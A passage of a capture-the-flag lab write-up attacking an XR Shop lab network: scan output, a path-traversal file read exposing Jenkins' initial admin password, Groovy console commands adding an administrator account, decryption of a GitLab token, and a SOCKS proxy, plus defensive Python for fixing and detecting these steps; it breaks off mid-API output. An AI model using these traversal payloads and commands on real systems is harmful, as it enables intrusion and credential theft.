Privilege
Gathering target information
The challenge provides the IP: 39.103.138.101
Challenge description
Stage 1: Obtain the backup of the XR Shop website's source code and try to gain arbitrary file read on the system. The administrator also kept the initial administrator password when configuring Jenkins; read that password and take control of the Jenkins server. The Jenkins configuration directory is C:\ProgramData\Jenkins\.jenkins.
Stage 2: The administrator configured GitLab for Jenkins. Obtain the GitLab API token and, through it, the sensitive repository in GitLab. With the sensitive information obtained, connect to the Oracle database and take control of the ORACLE server.
Stage 3: Attack the office network, gain control of an office PC, and escalate to SYSTEM through privilege abuse.
Stage 4: Take over the backup operator account, dump NTDS to obtain domain administrator privileges, and finally control the whole domain.
Scanning ports and paths
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.103.138.101:139 open
39.103.138.101:8080 open
39.103.138.101:135 open
39.103.138.101:80 open
39.103.138.101:3306 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]39.103.138.101
[->]XR-JENKINS
[->]172.22.14.7
[*] WebTitle http://39.103.138.101:8080 code:403 len:548 title:None
[*] WebTitle http://39.103.138.101 code:200 len:54732 title:XR SHOP
[+] PocScan http://39.103.138.101/www.zip poc-yaml-backup-file
已完成 5/5
[*] 扫描结束,耗时: 1m10.638390649s
┌──(root㉿kali)-[~]
└─# dirsearch -u "http://39.103.138.101/"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_39.103.138.101/__24-04-19_10-51-48.txt
Target: http://39.103.138.101/
[10:51:48] Starting:
[10:51:59] 301 - 0B - /%2e%2e//google.com -> http://39.103.138.101/%2E%2E/google.com
[10:54:13] 301 - 0B - /0 -> http://39.103.138.101/
[10:55:06] 301 - 0B - /adm/index.php -> http://39.103.138.101/adm/
[10:55:07] 302 - 0B - /admin -> http://39.103.138.101/wp-admin/
[10:55:12] 301 - 0B - /admin. -> http://39.103.138.101/admin
[10:55:14] 302 - 0B - /admin/ -> http://39.103.138.101/wp-admin/
[10:55:23] 301 - 0B - /admin/index.php -> http://39.103.138.101/admin/
[10:55:25] 301 - 0B - /admin/mysql/index.php -> http://39.103.138.101/admin/mysql/
[10:55:26] 301 - 0B - /admin/mysql2/index.php -> http://39.103.138.101/admin/mysql2/
[10:55:26] 301 - 0B - /admin/phpMyAdmin/index.php -> http://39.103.138.101/admin/phpMyAdmin/
[10:55:26] 301 - 0B - /admin/phpmyadmin/index.php -> http://39.103.138.101/admin/phpmyadmin/
[10:55:26] 301 - 0B - /admin/phpmyadmin2/index.php -> http://39.103.138.101/admin/phpmyadmin2/
[10:55:26] 301 - 0B - /admin/PMA/index.php -> http://39.103.138.101/admin/PMA/
[10:55:26] 301 - 0B - /admin/pma/index.php -> http://39.103.138.101/admin/pma/
[10:55:29] 301 - 0B - /admin2/index.php -> http://39.103.138.101/admin2/
[10:55:37] 301 - 0B - /admin_area/index.php -> http://39.103.138.101/admin_area/
[10:56:13] 301 - 0B - /adminarea/index.php -> http://39.103.138.101/adminarea/
[10:56:20] 301 - 0B - /admincp/index.php -> http://39.103.138.101/admincp/
[10:56:27] 301 - 0B - /adminer/index.php -> http://39.103.138.101/adminer/
[10:56:43] 301 - 0B - /administrator/index.php -> http://39.103.138.101/administrator/
[10:57:17] 301 - 0B - /apc/index.php -> http://39.103.138.101/apc/
[10:57:38] 301 - 0B - /asset.. -> http://39.103.138.101/asset
[10:57:39] 301 - 0B - /atom -> http://39.103.138.101/feed/atom/
[10:57:50] 301 - 0B - /axis2-web//HappyAxis.jsp -> http://39.103.138.101/axis2-web/HappyAxis.jsp
[10:57:50] 301 - 0B - /axis//happyaxis.jsp -> http://39.103.138.101/axis/happyaxis.jsp
[10:57:50] 301 - 0B - /axis2//axis2-web/HappyAxis.jsp -> http://39.103.138.101/axis2/axis2-web/HappyAxis.jsp
[10:57:58] 301 - 0B - /banner2 -> http://39.103.138.101/banner2/
[10:58:01] 301 - 0B - /bb-admin/index.php -> http://39.103.138.101/bb-admin/
[10:58:09] 301 - 0B - /bitrix/admin/index.php -> http://39.103.138.101/bitrix/admin/
[10:58:39] 301 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://39.103.138.101/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[10:58:40] 301 - 0B - /claroline/phpMyAdmin/index.php -> http://39.103.138.101/claroline/phpMyAdmin/
[10:59:28] 302 - 0B - /dashboard -> http://39.103.138.101/wp-admin/
[10:59:29] 302 - 0B - /dashboard/ -> http://39.103.138.101/wp-admin/
[10:59:36] 301 - 0B - /db/index.php -> http://39.103.138.101/db/
[10:59:39] 301 - 0B - /dbadmin/index.php -> http://39.103.138.101/dbadmin/
[11:00:13] 301 - 0B - /engine/classes/swfupload//swfupload.swf -> http://39.103.138.101/engine/classes/swfupload/swfupload.swf
[11:00:13] 301 - 0B - /engine/classes/swfupload//swfupload_f9.swf -> http://39.103.138.101/engine/classes/swfupload/swfupload_f9.swf
[11:00:21] 301 - 0B - /etc/lib/pChart2/examples/imageMap/index.php -> http://39.103.138.101/etc/lib/pChart2/examples/imageMap/
[11:00:30] 301 - 0B - /extjs/resources//charts.swf -> http://39.103.138.101/extjs/resources/charts.swf
[11:00:33] 302 - 0B - /favicon.ico -> http://39.103.138.101/wp-includes/images/w-logo-blue-white-bg.png
[11:00:36] 301 - 0B - /feed -> http://39.103.138.101/feed/
[11:01:08] 301 - 0B - /h -> http://39.103.138.101/2022/12/25/hello-world/
[11:01:13] 301 - 0B - /hello -> http://39.103.138.101/2022/12/25/hello-world/
[11:01:20] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> http://39.103.138.101/html/js/misc/swfupload/swfupload.swf
[11:01:36] 301 - 0B - /index.php -> http://39.103.138.101/
[11:01:39] 301 - 0B - /index.php/login/ -> http://39.103.138.101/login/
[11:01:47] 301 - 0B - /install/index.php?upgrade/ -> http://39.103.138.101/install/?upgrade/
[11:01:57] 301 - 0B - /jkstatus; -> http://39.103.138.101/jkstatus
[11:02:15] 200 - 19KB - /LICENSE.txt
[11:02:15] 200 - 19KB - /license.txt
[11:02:28] 302 - 0B - /login -> http://39.103.138.101/wp-login.php
[11:02:30] 301 - 0B - /login.wdm%20 -> http://39.103.138.101/login.wdm
[11:02:30] 301 - 0B - /login.wdm%2e -> http://39.103.138.101/login.wdm
[11:02:30] 302 - 0B - /login/ -> http://39.103.138.101/wp-login.php
[11:03:12] 301 - 0B - /modelsearch/index.php -> http://39.103.138.101/modelsearch/
[11:03:25] 301 - 0B - /myadmin/index.php -> http://39.103.138.101/myadmin/
[11:03:25] 301 - 0B - /myadmin2/index.php -> http://39.103.138.101/myadmin2/
[11:03:26] 301 - 0B - /mysql-admin/index.php -> http://39.103.138.101/mysql-admin/
[11:03:27] 301 - 0B - /mysql/index.php -> http://39.103.138.101/mysql/
[11:03:28] 301 - 0B - /mysqladmin/index.php -> http://39.103.138.101/mysqladmin/
[11:03:31] 301 - 0B - /New%20folder%20(2) -> http://39.103.138.101/New%20folder%20(2
[11:03:55] 301 - 0B - /panel-administracion/index.php -> http://39.103.138.101/panel-administracion/
[11:04:10] 301 - 0B - /phpadmin/index.php -> http://39.103.138.101/phpadmin/
[11:04:14] 301 - 0B - /phpma/index.php -> http://39.103.138.101/phpma/
[11:04:18] 301 - 0B - /phpmyadmin!! -> http://39.103.138.101/phpmyadmin
[11:04:33] 301 - 0B - /phpmyadmin-old/index.php -> http://39.103.138.101/phpmyadmin-old/
[11:04:33] 301 - 0B - /phpMyAdmin.old/index.php -> http://39.103.138.101/phpMyAdmin.old/
[11:04:34] 301 - 0B - /phpMyAdmin/index.php -> http://39.103.138.101/phpMyAdmin/
[11:04:34] 301 - 0B - /phpmyadmin/index.php -> http://39.103.138.101/phpmyadmin/
[11:04:34] 301 - 0B - /phpMyAdmin/phpMyAdmin/index.php -> http://39.103.138.101/phpMyAdmin/phpMyAdmin/
[11:04:34] 301 - 0B - /phpmyadmin/phpmyadmin/index.php -> http://39.103.138.101/phpmyadmin/phpmyadmin/
[11:04:34] 301 - 0B - /phpmyadmin1/index.php -> http://39.103.138.101/phpmyadmin1/
[11:04:35] 301 - 0B - /phpmyadmin0/index.php -> http://39.103.138.101/phpmyadmin0/
[11:04:35] 301 - 0B - /phpmyadmin2/index.php -> http://39.103.138.101/phpmyadmin2/
[11:04:36] 301 - 0B - /phpMyAdminold/index.php -> http://39.103.138.101/phpMyAdminold/
[11:04:37] 301 - 0B - /phpMyadmin_bak/index.php -> http://39.103.138.101/phpMyadmin_bak/
[11:04:44] 301 - 0B - /pma-old/index.php -> http://39.103.138.101/pma-old/
[11:04:44] 301 - 0B - /PMA/index.php -> http://39.103.138.101/PMA/
[11:04:44] 301 - 0B - /pma/index.php -> http://39.103.138.101/pma/
[11:04:45] 301 - 0B - /PMA2/index.php -> http://39.103.138.101/PMA2/
[11:04:46] 301 - 0B - /pmamy2/index.php -> http://39.103.138.101/pmamy2/
[11:04:46] 301 - 0B - /pmamy/index.php -> http://39.103.138.101/pmamy/
[11:04:46] 301 - 0B - /pmd/index.php -> http://39.103.138.101/pmd/
[11:05:10] 200 - 7KB - /README.html
[11:05:10] 301 - 0B - /rating_over. -> http://39.103.138.101/rating_over
[11:05:10] 200 - 7KB - /ReadMe.html
[11:05:10] 200 - 7KB - /Readme.html
[11:05:10] 200 - 7KB - /readme.html
[11:05:28] 301 - 0B - /roundcube/index.php -> http://39.103.138.101/roundcube/
[11:05:29] 200 - 114B - /robots.txt
[11:05:29] 301 - 0B - /rss -> http://39.103.138.101/feed/
[11:05:32] 301 - 0B - /s -> http://39.103.138.101/sample-page/
[11:05:32] 301 - 0B - /sample -> http://39.103.138.101/sample-page/
[11:05:49] 301 - 0B - /servlet/hello -> http://39.103.138.101/2022/12/25/hello-world/
[11:06:08] 301 - 0B - /siteadmin/index.php -> http://39.103.138.101/siteadmin/
[11:06:10] 302 - 0B - /sitemap.xml -> http://39.103.138.101/wp-sitemap.xml
[11:06:21] 301 - 0B - /sql/index.php -> http://39.103.138.101/sql/
[11:06:30] 301 - 0B - /static.. -> http://39.103.138.101/static
[11:06:39] 301 - 0B - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates -> http://39.103.138.101/sugarcrm/?module=Accounts&action=ShowDuplicates
[11:06:39] 301 - 0B - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates -> http://39.103.138.101/sugarcrm/?module=Contacts&action=ShowDuplicates
[11:07:03] 301 - 0B - /templates/beez/index.php -> http://39.103.138.101/templates/beez/
[11:07:03] 301 - 0B - /templates/ja-helio-farsi/index.php -> http://39.103.138.101/templates/ja-helio-farsi/
[11:07:03] 301 - 0B - /templates/rhuk_milkyway/index.php -> http://39.103.138.101/templates/rhuk_milkyway/
[11:07:18] 301 - 0B - /tmp/index.php -> http://39.103.138.101/tmp/
[11:07:18] 301 - 236B - /tools -> http://39.103.138.101/tools/
[11:07:18] 200 - 1KB - /tools/
[11:07:22] 301 - 0B - /tools/phpMyAdmin/index.php -> http://39.103.138.101/tools/phpMyAdmin/
[11:07:26] 301 - 0B - /typo3/phpmyadmin/index.php -> http://39.103.138.101/typo3/phpmyadmin/
[11:07:34] 301 - 0B - /us -> http://39.103.138.101/usces-cart/
[11:08:24] 301 - 0B - /web/phpMyAdmin/index.php -> http://39.103.138.101/web/phpMyAdmin/
[11:08:25] 301 - 0B - /webadmin/index.php -> http://39.103.138.101/webadmin/
[11:08:35] 301 - 239B - /wp-admin -> http://39.103.138.101/wp-admin/
[11:08:35] 200 - 1KB - /wp-admin/install.php
[11:08:35] 409 - 3KB - /wp-admin/setup-config.php
[11:08:35] 302 - 0B - /wp-admin/ -> http://39.103.138.101/wp-login.php?redirect_to=http%3A%2F%2F39.103.138.101%2Fwp-admin%2F&reauth=1
[11:08:35] 400 - 1B - /wp-admin/admin-ajax.php
[11:08:36] 200 - 0B - /wp-config.php
[11:08:37] 301 - 241B - /wp-content -> http://39.103.138.101/wp-content/
[11:08:37] 200 - 0B - /wp-content/
[11:08:39] 200 - 254B - /wp-content/plugins/hello.php
[11:08:39] 200 - 710B - /wp-content/upgrade/
[11:08:39] 200 - 1KB - /wp-content/uploads/
[11:08:40] 301 - 0B - /wp-content/plugins/adminer/inc/editor/index.php -> http://39.103.138.101/wp-content/plugins/adminer/inc/editor/
[11:08:41] 301 - 242B - /wp-includes -> http://39.103.138.101/wp-includes/
[11:08:41] 200 - 55KB - /wp-includes/
[11:08:41] 200 - 6KB - /wp-login.php
[11:08:42] 200 - 0B - /wp-includes/rss-functions.php
[11:08:43] 200 - 0B - /wp-cron.php
[11:08:43] 200 - 161KB - /wp-json/
[11:08:43] 200 - 581B - /wp-json/wp/v2/users/
[11:08:44] 301 - 0B - /wp-register.php -> http://39.103.138.101/wp-login.php?action=register
[11:08:44] 302 - 0B - /wp-signup.php -> http://39.103.138.101/wp-login.php?action=register
[11:08:46] 200 - 36MB - /www.zip
[11:08:48] 301 - 0B - /www/phpMyAdmin/index.php -> http://39.103.138.101/www/phpMyAdmin/
[11:08:49] 405 - 42B - /xmlrpc.php
[11:08:50] 301 - 0B - /xampp/phpmyadmin/index.php -> http://39.103.138.101/xampp/phpmyadmin/
Task Completed
Finding the vulnerability
The web root exposes a packed archive, www.zip; downloading and unpacking it gives the site's source code. tools/content-log.php contains an arbitrary file read vulnerability:
// tools/content-log.php
<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
// Get the content and echo it.
$text = file_get_contents( $logfile );
echo( $text );
}
exit;
Exploiting it:
http://39.103.138.101/tools/content-log.php?logfile=../../../../../../../../../../../Users/Administrator/flag/flag01.txt
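The handler above hands a raw, URL-decoded query value straight to file_exists()/file_get_contents(), so any file the web server account can read is served. The Python below is an added example, not code from the page or from the XR Shop site, showing the two defender-side pieces: a resolver that confines the decoded name to an allowlisted directory (LOG_DIR is a hypothetical path), and a check over constructed access-log lines that surfaces traversal requests of the kind used in this writeup, including URL-encoded forms.

```python
import os
from urllib.parse import unquote

# Hypothetical directory the handler would be allowed to serve from (not a path from the page).
LOG_DIR = "/var/www/html/tools/logs"


def resolve_log_path(user_value, base_dir=LOG_DIR):
    """Return the canonical path for user_value if it stays inside base_dir, else None.

    The value is URL-decoded first, mirroring the original handler's rawurldecode(),
    so the containment check sees exactly what PHP would open.
    """
    decoded = unquote(user_value)
    if "\x00" in decoded:                       # NUL would truncate the name in C-backed file APIs
        return None
    base = os.path.realpath(base_dir)
    # os.path.join drops base when decoded is absolute, so absolute paths fail the check too.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


TRAVERSAL_MARKERS = ("../", "..\\")

# Constructed access-log lines in combined log format, modelled on the requests in this writeup.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [19/Apr/2024:11:08:46 +0000] "GET /www.zip HTTP/1.1" 200 37748736',
    '10.0.0.5 - - [19/Apr/2024:11:12:03 +0000] "GET /tools/content-log.php?logfile=../../../../../../../../../../../Users/Administrator/flag/flag01.txt HTTP/1.1" 200 42',
    '10.0.0.5 - - [19/Apr/2024:11:15:41 +0000] "GET /tools/content-log.php?logfile=..%2F..%2F..%2FProgramData%2FJenkins%2F.jenkins%2Fsecrets%2FinitialAdminPassword HTTP/1.1" 200 33',
    '10.0.0.9 - - [19/Apr/2024:11:16:02 +0000] "GET /tools/content-log.php?logfile=content.log HTTP/1.1" 200 1024',
]


def find_traversal_requests(access_log_lines):
    """Return the decoded request targets that contain a '..' traversal sequence."""
    hits = []
    for line in access_log_lines:
        try:
            request = line.split('"')[1]        # 'GET /path?query HTTP/1.1'
            target = request.split(" ")[1]
        except IndexError:
            continue
        decoded = unquote(unquote(target))      # two rounds so %252e%252e is caught as well
        if any(marker in decoded for marker in TRAVERSAL_MARKERS):
            hits.append(decoded)
    return hits


if __name__ == "__main__":
    for value in ("content.log", "../../../../../../../../../../../Users/Administrator/flag/flag01.txt"):
        print(repr(value), "->", resolve_log_path(value))
    for hit in find_traversal_requests(SAMPLE_ACCESS_LOG):
        print("traversal:", hit)
```

In PHP the same fix is realpath() on the joined path plus a prefix comparison against realpath() of the log directory (or basename() if only flat file names are ever expected); what matters is that the decision is made on the canonical, decoded path rather than on the raw parameter.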
Following the hint, the Jenkins configuration directory is C:\ProgramData\Jenkins\.jenkins, and the initial Jenkins password sits in secrets/initialAdminPassword:
http://39.103.138.101/tools/content-log.php?logfile=../../../../../../../../../../../../../ProgramData/Jenkins/.jenkins/secrets/initialAdminPassword
Log in to Jenkins with admin:510235cf43f14e83b88a9f144199655b.
Login succeeds.
Find the script execution feature and use a Groovy script to run commands:
println 'net user chy 123!@#qwe /add'.execute().text
println 'net localgroup administrators chy /add'.execute().text
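A Groovy one-liner in the script console runs with the Jenkins service account's rights, and the two net commands above leave a very characteristic trace in the Windows Security log: event 4720 (a user account was created) followed seconds later by 4732 (a member was added to a security-enabled local group) for the same principal. The Python below is an added detection example, not part of the writeup; the event records are constructed and simplified (real 4732 entries usually carry only MemberSid, so name resolution is assumed to have happened upstream).

```python
from datetime import datetime, timedelta

# Constructed, simplified Security-log records for the example (not from the page or a real host).
# 4720 = "A user account was created"; 4732 = "A member was added to a security-enabled local group".
# Real 4732 records usually carry only MemberSid; here MemberName is assumed already resolved.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Time": "2024-04-19T11:20:10", "SubjectUserName": "XR-JENKINS$",
     "TargetUserName": "chy"},
    {"EventID": 4732, "Time": "2024-04-19T11:20:11", "SubjectUserName": "XR-JENKINS$",
     "MemberName": "chy", "TargetUserName": "Administrators"},
    {"EventID": 4720, "Time": "2024-04-19T09:00:00", "SubjectUserName": "helpdesk01",
     "TargetUserName": "svc_reports"},
    {"EventID": 4732, "Time": "2024-04-19T15:30:00", "SubjectUserName": "helpdesk01",
     "MemberName": "svc_reports", "TargetUserName": "Remote Desktop Users"},
]

# Local groups whose membership grants administrative control of the host.
PRIVILEGED_LOCAL_GROUPS = {"administrators"}


def find_new_local_admins(events, window=timedelta(minutes=10)):
    """Correlate 4720 with a later 4732 into a privileged group for the same account.

    Returns one alert per account that was created and made a local administrator
    within `window`; benign account creation without a privileged group add is ignored.
    """
    created_at = {}
    for ev in events:
        if ev["EventID"] == 4720:
            created_at[ev["TargetUserName"].lower()] = datetime.fromisoformat(ev["Time"])

    alerts = []
    for ev in events:
        if ev["EventID"] != 4732:
            continue
        group = ev.get("TargetUserName", "").lower()     # in 4732 the target is the group
        member = ev.get("MemberName", "").lower()
        if group not in PRIVILEGED_LOCAL_GROUPS or member not in created_at:
            continue
        gap = datetime.fromisoformat(ev["Time"]) - created_at[member]
        if timedelta(0) <= gap <= window:
            alerts.append({
                "user": member,
                "group": group,
                "by": ev["SubjectUserName"],
                "gap_seconds": int(gap.total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_new_local_admins(SAMPLE_EVENTS):
        print(f"new local admin {alert['user']} created and added to {alert['group']} "
              f"by {alert['by']} within {alert['gap_seconds']}s")
```

A SubjectUserName ending in `$` on the 4720, as in the sample, means the account was created by code running as the machine/SYSTEM context; on a CI server that alone is worth an alert, since build and admin tooling normally acts as a named user.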
Connect to the target over RDP. After logging in, the database password turned up, but nothing else useful.
Then upload fscan to the target and scan the internal network it revealed:
PS C:\Users\chy\Desktop> .\fscan.exe -h 172.22.14.7/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.7:3306 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file
已完成 22/22
[*] 扫描结束,耗时: 1m22.0774836s
- 172.22.14.7 already compromised
- 172.22.14.16 GitLab
- 172.22.14.31 WORKGROUP\XR-ORACLE
- 172.22.14.46 XIAORANG\XR-0923
- 172.22.14.11 DC XIAORANG\XR-DC
The GitLab API token is stored in Jenkins' credentials file.
File path: C:\ProgramData\Jenkins\.jenkins\credentials.xml
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
<scope>GLOBAL</scope>
<id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
<description></description>
<apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
The apiToken is stored encrypted; the hudson.util.Secret class decrypts such a string when run from the same script execution feature:
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
This yields the GitLab API token: glpat-7kD_qLH2PiQv_ywB9hz2
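Every secret in credentials.xml can be decrypted by anyone who can run Groovy on the controller, as the one-liner above shows, so after a Jenkins compromise the whole file has to be treated as disclosed and each credential rotated at its issuer (here the GitLab token). The Python below is an added example, not part of the writeup or of Jenkins itself; it inventories a credentials.xml (the sample is the file from this writeup, embedded verbatim) and reports each credential's type, ID, scope and which fields hold an encrypted blob, without decrypting anything.

```python
import re
import xml.etree.ElementTree as ET

# The credentials.xml from this writeup, embedded verbatim as the sample input.
SAMPLE_CREDENTIALS_XML = """<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
"""

# hudson.util.Secret serialises an encrypted value as '{' + base64 + '}'.
SECRET_BLOB = re.compile(r"^\{[A-Za-z0-9+/=]+\}$")


def inventory_credentials(xml_text):
    """List every credential stored in a Jenkins credentials.xml without decrypting anything."""
    # Jenkins writes an XML 1.1 declaration; drop it before handing the document to the
    # stdlib parser, which targets XML 1.0.
    stripped = xml_text.lstrip()
    if stripped.startswith("<?xml"):
        stripped = stripped.split("?>", 1)[1]
    root = ET.fromstring(stripped)

    found = []
    # Each domain entry keeps its credentials in a CopyOnWriteArrayList, one child per credential.
    for store in root.iter("java.util.concurrent.CopyOnWriteArrayList"):
        for cred in store:
            secret_fields = [child.tag for child in cred
                             if child.text and SECRET_BLOB.match(child.text.strip())]
            found.append({
                "kind": cred.tag.rsplit(".", 1)[-1],       # e.g. GitLabApiTokenImpl
                "plugin": cred.get("plugin", ""),
                "id": (cred.findtext("id") or "").strip(),
                "scope": (cred.findtext("scope") or "").strip(),
                "secret_fields": secret_fields,
            })
    return found


def rotation_list(xml_text):
    """IDs of credentials holding at least one encrypted field; all of these need rotating."""
    return [c["id"] for c in inventory_credentials(xml_text) if c["secret_fields"]]


if __name__ == "__main__":
    for cred in inventory_credentials(SAMPLE_CREDENTIALS_XML):
        print(f"{cred['kind']:<24} id={cred['id']} scope={cred['scope']} "
              f"plugin={cred['plugin']} encrypted={','.join(cred['secret_fields'])}")
```

GLOBAL scope means the credential is usable by every job on the controller, which is exactly why a single compromised build or script-console session exposes it; restricting credentials to the folder or job that needs them narrows what a Jenkins takeover hands over.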
Start gost on the target as a port forwarder:
.\gost-windows-amd64.exe -L=socks5://:1025
Configure proxychains on Kali to go through it.
Formatted in VS Code, the result is:
[
{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T08:30:12.373Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
